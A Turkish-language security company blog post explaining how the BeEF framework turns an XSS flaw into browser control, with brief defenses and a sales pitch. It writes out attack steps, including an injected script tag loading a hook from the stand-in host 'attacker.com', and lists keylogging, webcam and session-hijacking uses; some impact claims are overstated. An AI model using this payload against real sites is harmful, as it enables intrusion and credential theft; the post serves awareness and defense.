← Tüm Yazılar
Teknik,BeEF,XSS,Browser

BeEF (Browser Exploitation Framework) Nedir? XSS → Browser Kontrolü

2026-09-05 · 3 min okuma · REDCELL AR-GE
𝕏 Paylaş LinkedIn Paylaş 📧 E-posta Gönder

BeEF — Browser Exploitation Framework. XSS bulgusuyla başlayan saldırı, kurbanın tarayıcısını tam kontrol altına almak.

BeEF Nasıl Çalışır?

1. Bir XSS bulgusu var (reflected veya stored)
2. Hacker, XSS yoluyla kurbanın tarayıcısına BeEF hook payload'ı enjekte eder
3. Kurban hook'u yükler → tarayıcı attacker'ın "beehive"'ine bağlanır
4. Attacker, kurbanın tarayıcısından istediğini yapabilir

Pratik Saldırı

Adım 1: BeEF sunucusu başlat

./beef

Server açılır (http://localhost:3000)

Adım 2: XSS payload'ı hazırla

<script src="http://attacker.com:3000/hook.js"></script>

Adım 3: Kurbanın tarayıcısına enjekte et
Paylaşım linki, forum yorum, vb. yoluyla

Sonuç: Kurbanın tarayıcısı BeEF "zombie"'si haline gelir. Attacker:
- Keylogger → tüm tuşlar kaydedilir
- Screenshot → ne yapıyor görebilir
- Webcam access → kamera aç
- Redirect → phishing sitesine yönlendir
- Session hijacking → başka sitelerde login olur

---

🔴 Risk Derecesi: Kritik

Kötü Niyetli Hacker Ne Yapabilirdi?

XSS → Browser Kontrol: İşletim sistemini bypass et, admin paneline gir

Credential Theft: Tarayıcıda kaydedilmiş şifreleri çal

Malware Dağıtma: Kurbanın tarayıcısından exploit'ler indir, işletim sistemine bulaştır

Fidye Yazılımı: Kurbanın dosyaları şifrele, para iste

---

✅ Koruma

1. Input Validation: XSS açıklarını kapatınız
2. CSP Headers: Sadece güvenilir script'ler çalışsın
3. Browser Güvenliği: Add-on'ları update tutun
4. 2FA: Şifre çalınsa bile hesap korumalı

---

Sonuç

BeEF, tek bir XSS açığından başlayıp kurbanın tüm dijital hayatını kontrol edebilir. XSS, küçük bir açık değil — sistem kontrolü demektir.

🛡️ Sisteminizin güvenliğinden emin misiniz?

Ücretsiz Ön Değerlendirme →

Yazıdaki zafiyetlerden etkileniyor olabilirsiniz. REDCELL uzmanları 30 dakikada siber risk analizi yapar.

📚 Benzer Yazılar